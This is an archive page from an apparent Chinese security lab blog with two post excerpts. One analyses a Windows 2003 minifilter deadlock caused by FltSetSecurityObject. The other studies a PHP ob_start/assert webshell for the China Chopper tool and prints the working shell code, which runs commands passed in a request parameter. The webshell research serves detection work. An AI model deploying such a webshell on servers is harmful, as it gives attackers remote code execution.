Archive for 一月, 2016

FltSetSecurityObject引起的Win2003Sp2死锁分析

作者:椒图实验室
转载请注明出处:http://blog.jowto.com

0x00 前言

Minifilter是微软提供的开发Windows文件过滤驱动的一个框架,像安全防护类软件都有用到它。我们在客户的环境里发现了一个由fltmgr导致服务管理器死锁的bug。客户的环境是Win2003 SP2 x64,该服务器上安装了椒图的主机加固产品和某杀毒软件。问题来了,每次杀毒软件更新的时候都会导致服务器黑屏。经过我们排查发现是服务管理器的某个线程在等待杀毒软件的驱动卸载完成,但该线程一直无法完成卸载,好像是死锁了。最后我们找到了FltSetSecurityObject函数导致了死锁。

0x01 FltSetSecurityObject 实现原理

FltSetSecurityObject函数是FltMgr中的一个函数,它用来设置对象的ACL,它的函数原型为

NTSTATUS FltSetSecurityObject(
    IN PFLT_INSTANCE  Instance,
    IN PFILE_OBJECT  FileObject,
    IN SECURITY_INFORMATION  SecurityInformation,
    IN PSECURITY_DESCRIPTOR  SecurityDescriptor);

该函数从Windows 2000就提供了,但是从Windows Vista开始才支持,之前的版本如果调用该函数会返回错误码STATUSNOTIMPLEMENTED表示该Windows版本不支持这个功能。详见MSDN的说明: https://msdn.microsoft.com/en-us/library/windows/hardware/ff544538(v=vs.85).aspx。

我们以Windows 2003 SP2 X86(3790)下的fltmgr.sys(md5:f978277ef786532195cdd9f88e908632)作为分析对象,先看看FltSetSecurityObject函数的实现

NTSTATUS FltSetSecurityObject(
    IN PFLT_INSTANCE  Instance,
    
阅读全文
Posted on 一月 30, 2016 at 下午2:55 by admin · Permalink · Comments Closed
In: 内核技术

ob_start用于菜刀的可行性分析

作者:椒图实验室

转载请注明出处:http://blog.jowto.com

 

传统的ob_start马是这样用:

<?php
ob_start('assert'); 
echo $_REQUEST['pass']; 
ob_end_flush();
?>

经过本人测试这种方法在PHP5.4.X以上版本可以执行代码,但没有任何回显,当然也就不能用于菜刀,那么究竟是什么原因导致的不能回显呢?

分析
ob_start(“assert”)的意思设置assert作为ob操作结束时回调函数,ob_start要求回调函数接收两个参数,而在PHP 5.4.8以下版本assert只接受一个参数,所以5.3.X这样用都不能成功执行代码。恰好本人在做一个基于污点跟踪的webshell监控的玩意,测试这个时候始终不能执行,百思不得其解之后发现是版本问题,汗
5.4.8以上版本的PHP可以成功执行,但是assert执行内容不能有print/echo等ob输出,看PHP源代码找到原因:
main\output.c

PHPAPI void php_end_ob_buffer(zend_bool send_buffer, zend_bool just_flush TSRMLS_DC)
{

    OG
阅读全文
Posted on 一月 4, 2016 at 下午5:22 by admin · Permalink · Comments Closed
In: Web安全
友情链接